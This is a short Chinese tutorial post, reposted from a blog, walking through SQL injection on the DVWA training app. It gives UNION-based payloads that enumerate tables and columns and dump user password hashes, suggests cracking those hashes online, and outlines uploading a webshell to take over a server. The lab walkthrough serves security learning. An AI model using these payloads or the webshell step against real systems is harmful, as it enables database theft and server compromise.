SQL注入解題思路

尋找注入點，可以通過web掃描工具實現

通過注入點，嘗試得到連接數據庫的用戶名，數據庫名稱，權限等信息。

猜解關鍵數據庫表極其重要字段與內容。

通過獲得的用戶信息尋找后臺進行登錄。

利用后臺上傳webshell或一句話木馬，進一步提權拿到服務器權限。

?

?

1.隨便輸入id?1,2,3……?進行測試，發現輸入正確的ID會返回First name和Sumame信息，輸入錯誤的id不會返回信息

?

2.使用?1'or'1'='1?遍歷出數據庫表中的所有內容。

?

3.此時我們可以通過使用user(),database(),version()三個內置函數使用?1' and 1=2 union select user(),database() -- ?（注意插入的命令的格式以及空格）得到連接數據庫的賬戶名，數據庫名稱，數據庫版本信息。

?

4.猜測表名，通過注入?1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()#?

?

5.猜測列名，通過注入?1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'#?

?

6.猜測用戶密碼，通過注入?1' union select null,concat_ws(char(32,58,32),user,password) from users # ?

7.得到的用戶后的字符串為哈希值，可以登陸?https://cmd5.com/?對MD5進行在線破解為明文密碼。

轉載于:https://www.cnblogs.com/Hunter-01001100/p/10975977.html

總結

以上是生活随笔為你收集整理的DVWA-SQL注入的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。